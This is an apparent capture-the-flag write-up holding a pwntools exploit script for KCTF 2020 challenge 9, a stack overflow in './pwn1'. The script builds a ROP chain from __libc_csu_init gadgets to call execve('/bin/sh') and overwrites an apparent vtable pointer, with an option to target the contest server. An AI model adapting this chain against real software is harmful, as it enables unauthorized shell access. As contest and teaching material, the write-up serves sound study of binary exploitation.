KCTF2020秋季赛 第九题 命悬一线
2020-12-7 21:24 5788
栈溢出
"""Write-up exploit script for the KCTF 2020 autumn challenge #9 (stack overflow).

Written against Python 2 pwntools: ``str`` literals and the ``bytes`` returned
by ``p64()`` are concatenated directly (``buf = ''`` then ``buf += p64(...)``),
which raises ``TypeError`` on Python 3 — the literals would need to be ``b''``.

All gadget addresses and ``ea_buf`` are absolute, so the chain only fits the
exact non-PIE ``./pwn1`` build the author analysed; any other build (or a PIE /
CFI-hardened one) invalidates every hard-coded constant below.
"""
from pwn import *

target_file = './pwn1'
context.log_level = 'warn'
context.binary = target_file  # sets arch/endianness for p64() from the ELF header


def get_io():
    """Open a tube to the target, selected by pwntools' command-line ``args``.

    ``REMOTE=1``  -> TCP connection to the contest server.
    ``IDA=1``     -> spawn the IDA remote debug server instead of the binary.
    otherwise     -> run ``./pwn1`` locally.

    Returns: a pwntools tube (``remote`` or ``process``).
    """
    if args['REMOTE']:
        io = remote('121.36.145.157', 9999)
    elif args['IDA']:
        io = process([ './linux_server64' ])
    else:
        io = process([ target_file ])
    return io


def test():
    """Build the payload, send it once, then hand the tube to the user.

    Payload layout (offsets within ``buf``): the gadget chain occupies
    0x00..0x4F, ``'/bin/sh\\x00'`` sits at 0x50, the two-entry argv array at
    0x58, the syscall gadget pointer at 0x68, padding to 0xA0, then one
    trailing qword the author labels ``vtbl``.  The ``ea_buf + 0x50/0x58/0x68``
    values loaded into r14/r13/r12 match those offsets exactly, so the script
    assumes the sent buffer is stored at ``ea_buf`` — verify that address
    against the binary before reusing this.
    """
    io = get_io()
    if args['IDA']:
        # The IDA debug server prints its own banner first; skip past it so the
        # later interaction is not confused by debugger output.
        io.recvuntil('Looking for GNU DWARF file')
        io.recvline()
    # Fixed writable address the payload is assumed to land at (non-PIE
    # binary; 0x602xxx lies in its data region) — TODO confirm in the binary.
    ea_buf = 0x6020C0
    buf = ''
    buf += p64(0x40185C) # pop4
    buf += p64(0x4017E3) # rcx=0
    # "init_pop"/"init_call" are the author's names for what looks like the
    # usual __libc_csu_init pop6 / call-[r12+rbx*8] gadget pair — confirm.
    buf += p64(0x40185A) # init_pop
    buf += p64(0) # rbx
    buf += p64(0) # rbp
    buf += p64(ea_buf + 0x68) # r12
    buf += p64(ea_buf + 0x58) # r13, argv
    buf += p64(ea_buf + 0x50) # r14, path
    buf += p64(59) # r15, execve  (59 is the x86-64 execve syscall number)
    buf += p64(0x401840) # init_call
    # With rbx=0, init_call dereferences r12 = ea_buf+0x68, i.e. the syscall
    # gadget pointer appended below, while r14/r13 hold path/argv.
    buf += '/bin/sh\x00'  # offset 0x50: path
    buf += p64(ea_buf + 0x50) # argv[0]  (offset 0x58: argv array start)
    buf += p64(0)  # argv[1] = NULL terminator
    buf += p64(0x4017CC) # syscall  (offset 0x68, reached via r12)
    # Pad the overflow up to the field the author overwrites last.
    buf = buf.ljust(0xA0, 'A')
    # Presumably a vtable-pointer overwrite so that a later virtual call
    # dispatches into the chain at ea_buf — the exact object layout is not
    # visible here; verify against the binary.
    buf += p64(ea_buf - 0x18) # vtbl
    io.send(buf)
    io.interactive()
    return

test()